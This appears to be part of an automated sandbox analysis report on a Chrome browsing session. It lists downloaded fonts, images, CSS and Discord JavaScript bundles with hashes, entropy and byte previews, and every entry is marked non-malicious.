                                                                          Preview:RIFF44..WEBPVP8X..............ALPH+.....Fm.r...S.....!...\.(N.C...Ro.zKq._@p(P...X.R.X...........~.S~.wDL.....,.. ...z..g|..^.MZ.d...I.....X.|.....13...=&.2.z.+gv.3.=.5BO23{&X8....[{.....t.eS.{... .0 .2..e.X~...^...|G.T...5...^.6..N.O.%So/W..`..}....../...\..\....j\n..'..Iq.K.a...5.......e....j...T.V..g..2..z..VK......-....r..v"..M......l.f.Yi.T....5..J+.r.pR.e..<........z.."...+/...y..=."y.B.'...=7..xK...Fn....#?.Y ...Z6[.\..L.>....AZ.s.>.......-...70z.......Kg.X..L.6...."....ciL*.....q...?rX.m..Yr...L......s....e..Z[...K.d..d...-.n.Xl.t....S4.......ZB..,.|.%.J.$../...A.1...q.E...u8....z.YxJ{T.6.}..........X&.7.Z..r.yfb......B....[!|.X~r...J`M~......o...&.j.3C].~.{.u....=.^.|.fR.U...5.._Q.........b..T..Z.5.5..%.>.R.M.h.O...j......`%.....@..e._n.h..3S.uHU.v....{..3.hP&..[+..%....k..>.k."v3xc..c).?.U.UM.(.:?.x...s,apR,.Q..!.P.4%.}...U.g......J.."8...zT..x..e..la..O1.C{e.%......O.W<.*....|..j....;..xf*..i..<.2.v...e.&..S... .B..z..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format, TrueType, length 70792, version 1.1
                                                                          Category:downloaded
                                                                          Size (bytes):70792
                                                                          Entropy (8bit):7.993971518287878
                                                                          Encrypted:true
                                                                          SSDEEP:1536:nZtkgNOAkLVYEWezZESt3awjMxaDwFiP9pNMyWWIH:nbmA2YEtFtqwAE8Fij6yWWU
                                                                          MD5:4BEFA5D563E4C824EC3728337206D385
                                                                          SHA1:9B9A0282A3553EFD198482F288C96D20280994E5
                                                                          SHA-256:7AAAC26C2DC9BC3D84A623E8A9DA07F426B2A7BB056C17A377B559650DC94708
                                                                          SHA-512:3205F54DBF337AED7623A58A88C39564A3003C1A5F0EAC1B815DBF7DC411788540909E913CA7C400EBC908B52F7C1503AEFD1AC438E225BC5603E0009E661BF3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://fonts.gstatic.com/s/opensans/v36/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0C4k.woff
                                                                          Preview:wOFF........................................GDEF...............$GPOS.......'..7..:..GSUB.......Z...0....OS/2...8...U...`.@.,STAT.......H...^^.C9cmap................cvt .. .........=?,.fpgm..!L...........Zgasp..)$...........#glyf..)4.....Bx..2>head.......6...6..4.hhea....... ...$....hmtx.......T.....O2Uloca...p...%...~q."Omaxp....... ... ....name.......(...x7.c.post..........$..9..prep..............{.x.-....`...s....e...l.v.m.vZ...lc.m...zr.@.........#......S .39..6mCh.v@..|$......t..)..@.*R.*T.*U.F..S...SB./zb8.QXl79b.#...[.....i.;.#.;".96....(rD.#.9.l.X... .r.]..v-..|h................ag.\;?v..q.....e............v..Z...vm....G.A..Y......b......>..)Aip...a.j..L....x.<....J...w.KR...m.1.F.Am.;.m..3...y.....s#...{...R......|..'......o}.95...........P..O>....c.m..w...&.$...\U.h.CQ..6......|......<.....\Ks..r...K.1...J.w6...3...../.^0.W[s....;.>.t.....x.:I...iVR:.{.B}x..Od..`...8.f..v.NR..p..r...RY.Jq)(........19..w..Y .d...?.$...,....-.v.^...X.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):38336
                                                                          Entropy (8bit):7.988197256434672
                                                                          Encrypted:false
                                                                          SSDEEP:768:36bjJUjtPDUAUGAklMslrreu+tz45J1CybGmMNEOtXSqA1:3uatPDESMxRcJjEZC
                                                                          MD5:9EDD264E8B2C02A1C32AF134A2854367
                                                                          SHA1:2502C87D59D86F559811DDA8F7B92E2B312AC0F1
                                                                          SHA-256:1155B866B60FBA05612240FDE786C469E047F4915BB8D63A975125C5CE89E855
                                                                          SHA-512:BAE3A8E3891A088EE948BDBB661CABA70DA0005EE0196F0A1FCFA5B0A4854A7E614E548A7A5EDF048EA5D995DEE5D80BAE61527728496EF766AEDC23992A3E17
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx..utU.....zw........8!X.A....h)R\K.:..B)m..R......8.7.{.z.\s......q..4...u..<.../...'..._..._..W'q.......S....i.8u._.....7g8.>.-.o.r.>......;...{.o........8.;w.............^....p..8.I.^.....(.O?...?.._.......~..?.r.?]........z..~.|.?_.._.\..t...W...+..2.._q...z.....+..z.W...kt..+..z..~..k....7......._..y......q..n....[.p..m..n..m..-....o...z|....w..6=..wp..]....kt..;w.._.....7.....o......;?..w...\..~......?......~..........?......AWz....Oz,]9......O...OU.N..w.k.p',.'Aw...:s.$..k..s...'=p.-.G.M.]f.L.]1....d.......\...\.~S......u..n.^..#.......g.N.N....sG......!S...+..C'].......J..S`.........\...t*x.t6..../.w..8..w..]....+...}(..8..]c...p7.0..w..-\.%]o2|....jg.rw,.......UN..U.UNx......n.U.O.N.M.K....).........l>Q......w...!p......X../..lU...o.:.&.j...m.Vo..UN.L...M.M.VQ.~kK..).X.b.....(....tf...../......q'.<.o.....p.*.i,...KU....r._.....Z..].y.7.<.Vo....jl....d.J.wG..|5.r...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):26192
                                                                          Entropy (8bit):7.988846311209446
                                                                          Encrypted:false
                                                                          SSDEEP:768:akKeYyz7IV8nUB87kHpyHA000C5W4KszQ3:dYVlB87kYHA0p4xQ3
                                                                          MD5:B290BE8F94CB56EE0EA82017816B402B
                                                                          SHA1:0168F21AB768EC4F3248D30AAB762EC5FE45FE6A
                                                                          SHA-256:51062AD26A4F365D8CAA68DEB4EFDF9A689B2286B53B1F0961F129B80076D586
                                                                          SHA-512:9908456A6B6BEC21D2925A4A4D637B7913257B3F48B9DAA269BC3C61333B7ADB33B563AB6668BF1BFE3F9D6C663E6BA2900C8594A08CBDAB6C2128A066FC75A9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_3940_91e199a0b7.png
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx..u\..?.v..I.Jww.....(!b..(*..(..vw..k....R..s_..u. ......|.G.....y..y.......n.._...Z}d...._.*..t..QkG.VQ.........a..?_.N:......m_I.........G-W*.......t.{..7...o.......M.. %........^.'+.p......l.x.&....T..~.q.....U...Z....K.....QX..2[...z..._......*.s.......J...z....{Ui.o..B.uP.{.|C.....{..{.U.....z...:.p..h.e.^f......p.....{.....^.....I......,B.g$.......3.^.}..P..I/.>.E.....p.."T~F....`.*?#...G........#X...Hz...,B.g$.......3.^.}..P..I/.>.E.....p.."T~F....`.*?#...G........#X...Hz...,B.g$............G.....|..."..4.?j#..[.Q..V7|...z....S...g........$.z........j.q....6..44....mP.....?j.lw.....p.^...2..u....0.~........H.+1)|.'.5..\n....^..T.;.../:Hc+....7.B.T<l%..[...>Kv......f..H.?...S..X........a..Hm.......G....7.CR.g-.b...^.g*L.Q.&y(..Bu9+gY......l....Y..4?...a.. .........P...m..D.'.....Gg..l....j..`c.@.kq..7.ss.xn....sEA4cJ{..U.Xm..d.Orm.W....OxR..p5Xj3."MG.....s4..az.....Kyq{..._.:
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (16235)
                                                                          Category:downloaded
                                                                          Size (bytes):16289
                                                                          Entropy (8bit):5.704683270617882
                                                                          Encrypted:false
                                                                          SSDEEP:192:hEOcvOVlEdgs7ITaWacFyoJh4KVe1uto0Rr6BFZmEDcEY1szeS8lDsJ17g+4fOrJ:h/PCgaIl38oJhbOutrWBFfXMbsfzAKaU
                                                                          MD5:A51F264668891834BB2173420E930956
                                                                          SHA1:70AB9026466582FFA38EB9FCC7D5E2E76E159B3A
                                                                          SHA-256:252867B4D98C9D93B9DB19577498CFA2052D309439D609654E2346E1D8538AFE
                                                                          SHA-512:AC8222292B290BC2A158D1C6F09B5F666155727B11BDFC7862A0EAAE0BEEC9CA7B0A0244A12F72292C903530C569FACD62C825C61DA4EF5B3D2B3DF442CA1A90
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/7105.da032cdf2d68f70cd9db.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["7105"],{272030:function(e,t,n){"use strict";n.r(t),n.d(t,{closeContextMenu:function(){return a},openContextMenu:function(){return o},openContextMenuLazy:function(){return E}}),n("506083");var i=n("913144"),l=n("244201"),u=n("773336"),r=n("749866"),s=n("49111");function _(e){i.default.dispatch({type:"CONTEXT_MENU_OPEN",contextMenu:e})}function a(e){{let{flushSync:t}=n("817736");t(()=>{i.default.wait(()=>{i.default.dispatch({type:"CONTEXT_MENU_CLOSE"}).finally(e)})})}}function o(e,t,n,i){var a,o,E;if(e.stopPropagation(),null!=e.currentTarget.contains&&!e.currentTarget.contains(e.target))return;let d=0,c=0;if("pageX"in e&&(d=e.pageX,c=e.pageY),0===d&&0===c){let t=null===(a=e.target)||void 0===a?void 0:a.getBoundingClientRect(),{left:n=0,top:i=0,width:l=0,height:u=0}=null!=t?t:{};d=n+l/2,c=i+u/2}let I={render:t,renderLazy:i,target:null!==(o=e.target)&&void 0!==o?o:e.currentTarget,rect:new DOMRect(d,c,0,0),config:{conte
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (40484)
                                                                          Category:downloaded
                                                                          Size (bytes):40539
                                                                          Entropy (8bit):5.553580062037779
                                                                          Encrypted:false
                                                                          SSDEEP:768:EcSfMPek/b18EnqX8SwRhfIF9CE5IEqawDcDbs:EcSfONJ8EnqX8Sw/skz
                                                                          MD5:D485ABDA056D423DA40940588A3877E7
                                                                          SHA1:6188D5EC2A7CB47D15A2DED4759B4ED712411246
                                                                          SHA-256:89ACD2A7D09801C5E82F776C9DFFB218CBE36C7C6E6238BEA7738F5577CBC3E2
                                                                          SHA-512:B95DFAE2E539540EFF08C4767D5851511D1ABCAED76F5BFAD17D6D2D9CD674BF1B183A48BC80182D33D0D778776FAAE5F30FBF54BF5FE5B9A271A3B62D4E818C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/79417.40e5966eb87d1ff2ee44.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["79417"],{850068:function(e,t,n){"use strict";n.r(t),n.d(t,{deletePaymentSource:function(){return T},updatePaymentSource:function(){return P},validatePaymentSourceBillingAddress:function(){return h},createAdyenPaymentSourceToken:function(){return O},createPaymentSource:function(){return U},dispatchConfirmationError:function(){return B},createCardToken:function(){return D},confirmEPS:function(){return b},confirmIdeal:function(){return w},confirmPrzelewy24:function(){return g},confirmSofort:function(){return M},confirmCardPaymentSource:function(){return G},createPaymentRequestPaymentSource:function(){return F},createBraintreePaymentSource:function(){return Y},createStripePaymentSource:function(){return v},createAdyenPrepaidPaymentSource:function(){return k},createAdyenVaultablePaymentSource:function(){return V},createStripePaymentSourceToken:function(){return H},createPaymentSourceToken:function(){return K},fetchPayme
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                          Category:downloaded
                                                                          Size (bytes):5054
                                                                          Entropy (8bit):7.956284774512699
                                                                          Encrypted:false
                                                                          SSDEEP:96:bUAXVIKjV8RrfH9SeeSKDRWQc+rfP8O/JbyllQKuZDmGtvGohr7Utd99k20RQNg3:brIKYCSKtWQZjPtJbyllzuhmmvJhUzYv
                                                                          MD5:7CD3960A5002EC8FFD672267DBD184CF
                                                                          SHA1:9C353D573E5F9CB57DF4068CED24B2455B6F3DDD
                                                                          SHA-256:1562ED280E5486999BFA41E9EDDF46996B078B54E14FFF9748B427C793BC6969
                                                                          SHA-512:80D896C72978AA1DECBA757F080B98862E20173182F06604137A9D7228E4ABBBE40A859F5EC338E3DE4BE237A47F418434F0CFA252CB77A8328D33A9DF8E74A5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getWalletImage/c39b3a16-1a38-4588-f089-cb7aeb584700?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
                                                                          Preview:RIFF....WEBPVP8 ....pn...*....>I$.E..!...((....r.X..K.....0.i..............O....0|%..3.........._G=#...........O..^......].{.a.;.........>....._..n?.|.~....Cj................v../...}._......_.q.1...dQ...Z.._...{......../p^...U..L..b.h\YgN\^g.C. ..../R8..b>.>.@-../.p^BqE...>.!..j. ......,.J..# 7~.R53.=....L..b.h[@.`lH..'.........qt.......'..`....1:.e..\..G.0.C.nm{....xD....g%..a...S5.T2.\.:D.s7^..-+.......{~...o.......>*.x@..if.bz...9...e.h\Ym.J.!.......E...C..5......!....#./ ;.|.X...drW../2.-b.0c,./..Z%....<........l.C....c.lE..G^.:...d;....W.60.D.w.)..{......."m..|6H.9...J2.Z.t.:...>..`66........D.q.R.|.....C....a..}.x{.v...sB...%-u..w.V...D...i.".w.....G...w.....|.....Q..[.F|...^..xj....9~J....j........1p$>..+.....+,Y.D52.A...U~Ya.. ...'...r.L.!....Emg[...pv|....cZ...d....}....y..9a.}X.cY6..<.....^.D.........s.../..........f...~........./p^......@.....0e..c..k.n8...Wr.j.{......]...-\L.#@...R.!.ni."."E.F.O&J4..Y....?.RJ.n..V
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):1126
                                                                          Entropy (8bit):7.725459253081851
                                                                          Encrypted:false
                                                                          SSDEEP:24:omLPBsB/6kEb/QJzX+2A25PSjYBBukM7Z+lLN:7CB/6zQdJOjmBW7gLN
                                                                          MD5:D48754B77C5D1543AE9DE2FC0E49B2EF
                                                                          SHA1:D4E136DD147E6CECFBE58BE2E9AD0144CC747784
                                                                          SHA-256:EE420A3AA4EC8EACC9A76E87867480920D9DC882ABC3B9F231492561FEC35760
                                                                          SHA-512:481AD5DA97B74D0ABA0E4EA6E1EED24C9A2A9851866A4DFEED16C45856FDC170E25BA4DBCC95BFCEFC2E21DC0140A304F53919A5A57144CF91E00031557ABF87
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png&w=48&q=75"
                                                                          Preview:.PNG........IHDR...0...0.....`.......PLTE;j.......:i.:f|:g} 7d{7gz:d|YTM..~"##;l.6cy.....z..pQLG(=G5e~....4/*_YQ=<9HD>0Ug,JY6^q..zlY..kJIE'/3<GK.}W..=U^....qQ..naN..kK).bS?2....}.xaQithkj..Q...S@)....kY.....tRNS.......```.!.<....pHYs................QIDATx..V...8.D..]I...........?mC..l.t.#.XYYY..Q...|..k..(.Ke`.(.n..*.x..'.......K.O.W...>.*7...!.....`...4`.t.h_....F:q..S}...c..F.o.*Ok...f.....D....F"U.T.....2.....m.......U.....c..@.A..7../I...o;-i....z.e....%..K(9...;..<...E#.?.Q..f..o.&...m>.O.5..d....~.Q.........TL.i......b..........x<..)?........4..U..(fod.Y...&P.U..z../....<...DK7..t).r...E)...(....].0..+J)....D?..C{.."U.N....fn;..e...O.S.Z.L..<f2....u.iiQ+g&..l.[<....]9....1!..e..;...k.oY..B~.F.S..O.j\.a....1s0.r.-.5... Kb...1r....R..c.+!.`R.|~....".`^b>5...>9v..FZM...ahf.l..s..%i..b9. 4...Yw....KZ..4.@"..$.vI..5..p.K...7..!..Y..`..m.B8...A.9.....a.... 9.(.J.dK.fjX.....l .p.....r. ...)I........@......WU(...B...._.....k. (..*....^.`..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 2560x1440, components 3
                                                                          Category:dropped
                                                                          Size (bytes):271024
                                                                          Entropy (8bit):7.959522659004946
                                                                          Encrypted:false
                                                                          SSDEEP:6144:O5SfUaK7u4fsOPlsWlDx0v3LU5DBGJe/l6X9qT+DDVxY9bd:O5W0fsOPN0v3LQBGJe9DT+fYd
                                                                          MD5:56FEF5F6D34B3CDB3C2C703DE94B2590
                                                                          SHA1:B32A6521EC96105F764017E6EC2C7DED1891CF82
                                                                          SHA-256:F88A9E7514A37E97B728587487DEEBAD32496B8954F18A1EAE2BBAEE054984EF
                                                                          SHA-512:1D213448FEA0A8AC12C8453E50681A87828E1537EE34FBA0E60B9B3BEF81BEC0E7084FBC5ABC8FF37E552CC8D8A44F7897BD4DF80076D4412151938CB9076C8F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:9131d1a2-bd63-674d-882a-5ea481f59412" xmpMM:DocumentID="xmp.did:1B086B0DC7EA11EC8FB0A9EDF2FB2654" xmpMM:InstanceID="xmp.iid:1B086B0CC7EA11EC8FB0A9EDF2FB2654" xmp:CreatorTool="Adobe Photoshop 23.1 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:300930d1-4af6-4e47-9401-2236f1a7ba58" stRef:documentID="adobe:docid:photoshop:d140c537-ee50-4a46-b34e-ea0d23da1369"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..................X..."........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (12199)
                                                                          Category:downloaded
                                                                          Size (bytes):12248
                                                                          Entropy (8bit):5.6037057459585595
                                                                          Encrypted:false
                                                                          SSDEEP:192:LpBpFBnszZlCabHReAZNox/rA3MU6UOB5jBpeNGu5IB1+kwke3rFoiD+XJiyB+e0:LpBpFtiZlL7Re6Nox/rU67B5jBpap5IK
                                                                          MD5:56BD06D9F219816E9FE9A3D7F58F3E6F
                                                                          SHA1:BEAC919F21FBAEED806A632F604B3799FCBE1F7C
                                                                          SHA-256:179C22AF9CCCA0AA529212992ADC47BE5A52E1211A70A736D8799A5254908DB5
                                                                          SHA-512:E2CDD6AA8E58F070E9C4534747BFB9EA12F9B6FD85130A35F43ECEAC8B3FEC1B435B25B0E583D7B6455EB2730B9B2C29D9A7D46E3AB0C6F3133B368E26E0F416
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/361309226d7befece320.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["51077"],{524173:function(e,t,l){"use strict";l.r(t),l.d(t,{BellIcon:function(){return r}});var n=l("37983");l("884691");var a=l("669491"),s=l("75196");let r=e=>{let{width:t=24,height:l=24,color:r=a.default.colors.INTERACTIVE_NORMAL,colorClass:u="",...i}=e;return(0,n.jsx)("svg",{...(0,s.default)(i),xmlns:"http://www.w3.org/2000/svg",width:t,height:l,fill:"none",viewBox:"0 0 24 24",children:(0,n.jsx)("path",{fill:"string"==typeof r?r:r.css,d:"M9.7 2.89c.18-.07.32-.24.37-.43a2 2 0 0 1 3.86 0c.05.2.19.36.38.43A7 7 0 0 1 19 9.5v2.09c0 .12.05.24.13.33l1.1 1.22a3 3 0 0 1 .77 2.01v.28c0 .67-.34 1.29-.95 1.56-1.31.6-4 1.51-8.05 1.51-4.05 0-6.74-.91-8.05-1.5-.61-.28-.95-.9-.95-1.57v-.28a3 3 0 0 1 .77-2l1.1-1.23a.5.5 0 0 0 .13-.33V9.5a7 7 0 0 1 4.7-6.61ZM9.18 19.84A.16.16 0 0 0 9 20a3 3 0 1 0 6 0c0-.1-.09-.17-.18-.16a24.86 24.86 0 0 1-5.64 0Z",className:u})})}},576044:function(e,t,l){"use strict";l.r(t),l.d(t,{LocationIcon:fu
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):17273
                                                                          Entropy (8bit):7.98267978232318
                                                                          Encrypted:false
                                                                          SSDEEP:384:rwxVswtc4ZT8HW7tU14hNNdvCIjP3vc4A3+vX/tPOUgsSa+K:B4ZT8CtU1qbjP3ks/sUAa+K
                                                                          MD5:723BC36B7DFB2AB00B53BC8D4464551F
                                                                          SHA1:85F665935B26BC83619B9233DF35595438582F5B
                                                                          SHA-256:6B5BCEA7B1C7F38AB13BA5C2962484FE9D6EB934B379A1289BEC63FA88041333
                                                                          SHA-512:1703F7A4D89CEC5F7CF9B5AED0D40C1C452A6A5D0651B2C656304F60042094EA823836B46428CC2ECE5A5264F09F5FCA9191AA265A7FB2DC6AA1369882A4CFC2
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx..].|.....K/$..H.i.zB...B'.z...z.A.a.`CEz......4....l`W.......o.fovs.\..............6_a.menEEE..._.xQ......3.c`.....c...-.0...-+....e.a..nC.yY..|.K...u54V...nM....9(.}.......@c....}X!..u....-+./.D....A.3.0....|.....j.W.T.'.@Hp=.lQ...g.1.m@.[..5.-..O...^.M..-.t.........t....s5Q.Z....I......?~..4o.?.f....b.[.A$A%>W..\.0.......b2[.t.]|..(.....5k.W..&.'.].v!".....!..S.il..H6.&......,....=Y....8.%0.Ob.......s.uT.jh.........4.M.:U.j...V.s@.$..A'6J;.....G@...[..........k.....k.l.O.F..N.0&..s..[..e..T.L.....C.03..'...q..9..g.r..3..5.k......Sun....y.:....#( H3w.bI(d.5.d.jF...`).r#.|>....F....1.....G...arax..w.....j...l...p.B..n..$.|..$..Q5c/...Ds*.k.eX.j.6v..hnF!.G.....w9.Z.w....s.7v....s}.b7[..%S...T.Tb..9..'?<..g.^.X\.5:.G.Z....~...fks..\..C.....GM.k.~.-.k/.fa.a......,`SA7..@.i1\.7..6.o............~.a..0."...\U..j.RUp."P.._].......{.=..ava...q......Y..pB~K....MMM..y...|. 7.X......c&t....t%.j...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):14946
                                                                          Entropy (8bit):5.486287669582074
                                                                          Encrypted:false
                                                                          SSDEEP:384:fNQPN6NfNTyNUNCNiEQPE6EfETyEUECEiRQPR6RfRTyRURCRBn/en9encnNRnDn5:1Ya1moSPZXMbpveMmZac+BW9ec/DojLm
                                                                          MD5:B171B14DA51780CF303A065E13738917
                                                                          SHA1:C462B6D993BDD5E04FC8A1D251AC01F2A05CC668
                                                                          SHA-256:A243B37EDFE8B1DACD4072B361FE496B5C042E8F1C6115E922A5E0AD939745C3
                                                                          SHA-512:D419B954938DA3D5852896F872665D9C19F0CF24A10666F70E49A494EAE72BB91585DD4BB67F974FDE3972DBE40037085A90C616727572B4A98AE6F74F626927
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://fonts.googleapis.com/css2?family=Roboto+Condensed:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&display=swap"
                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto Condensed';. font-style: italic;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotocondensed/v27/ieVj2ZhZI2eCN5jzbjEETS9weq8-19eLAgM9UvI.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto Condensed';. font-style: italic;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotocondensed/v27/ieVj2ZhZI2eCN5jzbjEETS9weq8-19eLCwM9UvI.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto Condensed';. font-style: italic;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotocondensed/v27/ieVj2ZhZI2eCN5jzbjEETS9weq8-19eLAwM9UvI.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 1000x1000, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):80543
                                                                          Entropy (8bit):7.952897950927098
                                                                          Encrypted:false
                                                                          SSDEEP:1536:9+jBLYVuntyKaMrJ9cKixBJZ4FYzpIc2/MT1cpXxAu3TXEXxNvQw7:OmoZl9cxH4OFIby6pXz3TUh2w7
                                                                          MD5:585B898383EF2E60BA4A7391F6C54310
                                                                          SHA1:19BC35A5B59D615AF01217C331A5F366F038EDDE
                                                                          SHA-256:CD76EA13D28236744ED0D415225B28B2A3AF9325AFA5B91F3D1BB1960C9BE50C
                                                                          SHA-512:D85278687F729E0733BA16FA2609BC8C4CFBB25451B3731D17B63737B6F200DEFFA9567E008E130C9454EA0E765B2743CB008D56FDB34E353753DFDE7E63DB6D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg&w=1080&q=75"
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."........................................................................... ....X(..R.RT-.RX..(.B..."...@....,(.-.-%...........(....3A.S*..HB.P.......P.P....I-..@..Q.B.D-...PS4.%.@."......l."..T..).,...(....5.B[..T.P..@...".....`....".P..*R.:.(. .,.3.IBY@.".`..%..R.(.%.......,."."...PB..@X..............P......3C:.S4(. .....B..*"..,...........@.@.h@K.R..5....@...@......P..(.".R(.%RX(..,..P.B.....,,...dX,...-.h.`\....3PY.+.R.$.J..,.(..,.49.......EB.R......YBP..`.%....(.BP..X("....e.Y..,%.....,.4.P.Q,....#P.R...,.2.B.....(.U.,*R(..D..P...P.B.%.....@...8......,..l..D.j...RX.*h..,..5.H.*$.....B(.".I@."..P.(%...,R.e.\..(...Q/c.....s...}O...o3..~.....r..|.7.|.}...>_....\..c.?&.<.....aAPX...F6*.`XR..PT....IDP..A.4..J...@J,.(J.),....E...T.../_f...._....|6zZ..|.&...q`..Ki....E...}.>(t.>..._.y......2.X.K)e.m......%...... %.Al.a
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (11007)
                                                                          Category:downloaded
                                                                          Size (bytes):11056
                                                                          Entropy (8bit):5.654727025392316
                                                                          Encrypted:false
                                                                          SSDEEP:192:ABO40B5MITqJhEYYSsY3HSCeYGUPzvLDLLxVLuaDf:ABZ0B5zTqJhEPSsSLeYGezvLDLFZuaDf
                                                                          MD5:99792410A2974A73615132372288F1B3
                                                                          SHA1:505A5945BD85232DB3B7F27911097CCF557A796F
                                                                          SHA-256:73F425873860B24394A8D0DEF61749F99B59CFF87D9BCD1CF6A34AB7DC71C93F
                                                                          SHA-512:9011B81C8B80D78083C5668E9B6064C3396FC9C8B09F0209616AE870E6296A00052A6E5AE57ABEC41CDE439CE292C1052CCBF95F033411F84BF9200482478822
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/ec9008c958a13623f3e0.js
